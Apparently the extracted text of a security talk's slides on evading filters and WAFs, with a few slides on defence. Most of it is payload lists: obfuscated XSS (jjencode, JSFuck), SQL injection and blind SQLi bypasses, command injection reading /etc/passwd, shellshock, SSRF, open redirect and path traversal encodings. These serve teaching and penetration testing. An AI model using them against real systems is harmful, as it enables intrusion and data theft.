1. The document contains obfuscated JavaScript code that is attempting to execute an alert pop-up window containing the number 0 by bypassing input validation defenses. 2. It uses various encoding and obfuscation techniques to construct and execute the JavaScript, making it difficult for security filters to detect. 3. The goal is to demonstrate how input can be crafted in complex ways to bypass defenses and execute arbitrary JavaScript code on a vulnerable site.

1. Passing Security By
<script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,
$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+
$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"(""+$.__$+$.__$
+$._$$+$._$+""+$.__$+$.$$_+$._$_+$._$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$_$+$._$$+$._$+""+$.$__+$.___+""+$.__$+$._$_+$._$$+$.$$$_+""+
$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.__$+"""+$.$__+$.___+")"+""")())();</script>

2. The
Black
List

3. The
Black
List
The
White
Box

4. Show Me Your
/*Payl%0Ads*/
Payload Quality
How your payloads
Analytical skills
Ciklum Hiring Lab Logs

5. Computer !=
Human <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:
++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,
$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.
$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")
[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+
$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;
$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.$_$_+(![]+"")[$._$_]+$.$$
$_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())();</script>
<script>alert(0)</script>

6. White List Black List
Web Application
Firewall
Validation
Складно імплементувати
Складно підтримувати
Легко імплементувати
Впливає на навантаження
Весело обходити
Вразливість залишається на
сервері
BlackHat територія
Не відноститься до безпеки
напряму
Ускладнює пошук
вразливостей
Baaax61x61x61dNot bad remediation
Does not apply to security Vulnerability still exist

7. 01.
02.
03. 04.
Defense Reaction
03. Erase
End session for malicious user.
04. Logout
HTML encode input/output string.
01. Encode
Delete bad symbols, words.
02. Delete
Delete whole string, parameter is empty.

8. Security Bypass
Techniques
Encoding
Technology Border
Logic
Little-Known
Replacing
Obfuscating
RCE
SQL INJECTION
XSS
SSRF
DIRECTORY TRAVERSAL + LFI
OPEN REDIRECT

9. Xss
<script>alert()</script>
<script>prompt()</script>
<script>confirm()</script>
<script>console.log()</script>

10. Xss
outside: <script>alert()</script>
<tag "><script>alert()</script>
;alert()
<a href="javascript:alert(1)">

11. Xss
<scr<script>ipt>
<ScRipT>
<svg onload=“”>
<script >
<script x>

12. Xss Space
NULL <scri%00pt>alert ()</scri%00pt>
TAB <svg+src=“jav%09ascript:alert(1)">
Newline <script>//>%0Aalert(1);</script>
Carriage Return <script>//>%0Dalert(1);</script>
Spaces < s c r i p t > p r o m p t ( 1 ) < / s c r i p t

13. Xss Less Than
< < ‹ ＜ (Homoglyph)
Encoding %3c
Double encoding %253c
0xC0 0xBC (%C0%BC) - UTF
<img <

14. Xss Less Than<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
x3c
x3C
u003c
u003C
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;

15. Xss Inside <Script>
<script>u0061u006Cu0065u0072u0074(1)</script>
<script>a=“get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d);</script>
<img src="1"
onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
Obfuscate jjencode:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:
({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}
+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.
$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.
$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+
(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+$.
$_$_+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+""")())
();</script>

16. Jsfuck []()!+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+
[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]
+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+
(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+
[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]
+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+
[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+
[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+
[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+
(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])
[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]
+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+
(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+
[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

17. Nonamecon Ctf Xss
{{a = {'y':''.constructor.prototype};
a[‘y'].charAt=[].join;$eval('a=alert(1)');}}
document.cookie = document[‘cookie’]
{{a = {‘y’:’’[‘constructor’][‘prototype’]};a['y']
["charAt"]=[]["join"];$eval('a=alert(1)')}}

18. Nonamecon Ctf Xss
{{a = {‘y':''.constructor.prototype} =
{{a['y']=''['constructor']['prototype']
{{a[‘y’]=‘’[‘constructor']['prototype'];a['y']
['charAt']=[]['join'];$eval('a=alert(1)')}}
{{a['y']=''['constructor']['prototype']}}{{a['y']
['charAt']=[]['join']}}{{$eval('a=alert(1)')}}

19. Nonamecon Ctf Xss

20. Best Xss
><svg/onload=alert(1)>

21. Sql Injection
‘ %27 %2527
“ %22 %2522
# %23 %2523
-- %2d%2d %252d%252d
; %3B %253B
) %29 %2529
* %2a %252a
;%00 NULLBYTE
/* C-style comment
-- - SQL Comment

22. Sql Injection
Logic Testing‘ or 1=1 — true
‘ or 1=2 — false
‘ and 1=1 — true
‘ and 1=2 — false
‘ OR 1<2 — TRUE
‘ OR ‘aaa’<>’bbb’ — TRUE
HACK

23. Blind Sql Injection
‘+waitfor+delay+’00:00:05'--
‘+AND+BENCHMARK(1000000000,MD5(1))
‘+AND+SLEEP(5)

24. Sql Injection
Space%09 – Horizontal Tab
%0A – New Line
%0D – Carriage Return
%0B – Vertical Tab
%0C – New Page
%A0 - Non-breaking Space
/**/ - comment
/*!*/ - comment
'%0A%09UNION%0CSELECT%A0NULL%20%23

25. Sql Injection
Space Mssql%01 Start of Heading
%02 Start of Text
%03 End of Text
%04 End of Transmission
%05 Enquiry
%06 Acknowledge
%07 Bell
%08 Backspace
%09 Horizontal Tab
%0A New Line
%0B Vertical Tab
%0C New Page
%0D Carriage Return
%0E Shift Out
%0F Shift In
%10 Data Link Escape
%11 Device Control 1
%12 Device Control 2
%13 Device Control 3
%14 Device Control 4
%15 Negative Acknowledge
%16 Synchronous Idle
%17 End of Transmission Block
%18 Cancel
%19 End of Medium
%1A Substitute
%1B Escape
%1C File Separator
%1D Group Separator
%1E Record Separator
%1F Unit Separator
%20 Space
%25 %
S%E%L%E%C%T%01column%02FROM%03table;

26. Sql Injection
UNION(SELECT(column)FROM(table))
1’UNION(SELECT(1),2,3,4,5,(6)FROM(Users)WHERE(login=‘admin’))#
Allowed Intermediary Characters after AND/OR:
%20 Space
%2B +
%2D -
%7E ~
%21 !
%40 @
OR-+-+-+-+~~1=1

27. Sql InjectionSeLeCt
%00SELECT
SELSELECTECT
%53%45%4c%45%43%54
%2553%2545%254c%2545%2543%2554
UNION ALL SELECT
/*!union*/+/*!all*/+/*!select*/
AND -> && -> ‘&&1=2
OR -> || -> ‘||1=1
= -> LIKE,REGEXP, not < and not >
> X -> not between 0 and X
WHERE -> HAVING

28. Sql Injection
Avoiding the use of quotations:
WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) +
CHAR(110)
HEX
SELECT password FROM User WHERE login=0x61646D696E
No Comma:
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1) JOIN (SELECT 2) JOIN
(SELECT 3) JOIN (SELECT 4)
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).

29. Remote Commands ExecutionAdditional command
; ls
&& ls
| ls
|| ls
Inside command
$(cat /etc/passwd)
`cat /etc/passwd`
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6” - shellshock
Blind
sleep(5)
ping -i 30 127.0.0.1

30. Remote Commands Execution
Commands execution without space - Linux
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd - internal field separator
cat{$IFS}/etc/passwd
IFS=,;`cat<<<uname,-a`
who$@ami
w’h'o'am'i
w"h"o"am"i

31. Server-Side Request Forgery
http://127.0.0.1
http://localhost
http://0177.0.0.1
http://2130706433 = http://127.0.0.1
http://3232235521 = http://192.168.0.1
http://0xA9.0xFE.0xA9.0xFE/
http://[::]:80/
http://0000::1:80/
http://localtest.me

32. Server-Side Request Forgery

33. Server-Side Request Forgery
http://1.1.1.1&@2.2.2.2#@3.3.3.3/
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾

34. Open Url Redirection
//www.yoursite.com
https:www.yoursite.com
/www.yoursite.com/
//www.yoursite.com/
//www%E3%80%82yoursite%E3%80%82com
//www.yoursite%00.com
www.whitelisted.com.www.yoursite.com redirect to evil.com
http://www.theirsite.com@www.yoursite.com/
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
http://www.example.com/redirect.php?url=data:text/
html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

35. Directory Traversal + File Inclusion
/etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../.././././.././.././../../etc/passwd
../../../etc/passwd%00
….//….//etc/passwd
..///////..////..//////etc/passwd
..
../
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
6 bit Unicode encoding
. = %u002e
/ = %u2215
= %u2216
Double URL encoding
. = %252e
/ = %252f
= %255c
UTF-8 Unicode encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
= %c0%5c, %c0%80%5c

36. From File Inclusion To Rce
file upload forms/functions
PHP wrapper expect://command
PHP wrapper php://file
PHP wrapper php://filter
PHP input:// stream
data://text/plain;base64,command
log files with controllable input like:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail